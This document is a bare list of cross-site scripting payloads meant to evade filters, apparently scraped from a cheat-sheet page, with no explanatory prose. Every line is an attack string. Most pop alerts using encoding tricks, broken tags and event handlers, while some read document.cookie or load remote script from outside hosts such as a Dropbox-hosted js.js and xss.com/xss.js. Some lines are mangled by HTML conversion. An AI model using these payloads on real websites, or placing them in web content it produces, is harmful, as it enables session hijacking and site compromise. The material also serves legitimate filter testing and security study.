//|\ <script //|\ src='<a href="https://dl.dropbox.com/u/13018058/js.js'>">https://dl.dropbox.com/u/13018058/js.js'></a> //|\ </script //|\<br>
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}<br>
<a href="javascript:\u0061le%72t(1)"><button></p>
<p><div onmouseover='alert(1)'>DIV</div></p>
<p><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><br>
<a href="jAvAsCrIpT:alert(1)">X</a></p>
<p><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"></p>
<p><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><br>
<var onmouseover="prompt(1)">On Mouse Over</var><br>
<a href=javascript:alert(document.cookie)>Click Here</a><br>
<img src="/" =_=" title="onerror='prompt(1)'"><br>
<%<!--'%><script>alert(1);</script --></p>
<p><script src="data:text/javascript,alert(1)"></script></p>
<p><iframe/src \/\/onload = prompt(1)</p>
<p><iframe/onreadystatechange=alert(1)</p>
<p><svg/onload=alert(1)</p>
<p><input value=<><iframe/src=javascript:confirm(1)</p>
<p><input type="text" value=`` <div/onmouseover='alert(1)'>X</div><br>
<a href="http://www">http://www</a>.<script>alert(1)</script .com</p>
<p><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe></p>
<p><svg><script ?>alert(1)</p>
<p><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><br>
<img src=<code>xx:xx</code>onerror=alert(1)></p>
<p><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object></p>
<p><meta http-equiv="refresh" content="0;javascript:alert(1)"/></p>
<p><math><a xlink:href="//jsfiddle.net/t846h/">click</p>
<p><embed code="<a href="http://businessinfo.co.uk/labs/xss/xss.swf">http://businessinfo.co.uk/labs/xss/xss.swf</a>" allowscriptaccess=always></p>
<p><svg contentScriptType=text/vbs><script>MsgBox<br>
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a</p>
<p><iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE></p>
<p><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U</p>
<p><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F</p>
<p><script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script</p>
<p><object data=javascript:\u0061l&#101%72t(1)></p>
<p><script>++1-+?(1)</script></p>
<p><body/onload=<!-->&#10alert(1)></p>
<p><script itworksinallbrowsers>/<em><script</em> */alert(1)</script<br>
<img src ?itworksonchrome?\/onerror = alert(1)</p>
<p><svg><script>//
confirm(1);</script </svg></p>
<p><svg><script onlypossibleinopera:-)> alert(1)<br>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe</p>
<p><script x> alert</script 1=2</p>
<p><div/onmouseover='alert(1)'> style="x:"><br>
<--<code><img/src=</code> onerror=alert(1)> --!></p>
<p><a href="script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)">script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)</a></script></p>
<p><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button><br>
"><img src=x onerror=window.open('<a href="https://www.zsec.uk');>">https://www.zsec.uk');></a></p>
<p><form><button formaction=javascript:alert(1)>CLICKME</p>
<p><math><a xlink:href="//blog.zsec.uk">click</p>
<p><object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object></p>
<p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
1Click Me
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<scr\0ipt/src=http://xss.com/xss.js</script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)
">iframe%20src="http://blog.zsec.uk"%%203E
'<scriptwindow.onload=function(){document.forms[0].message.value='1';}</script>
x”</title><img src%3dx onerror%3dalert(1)>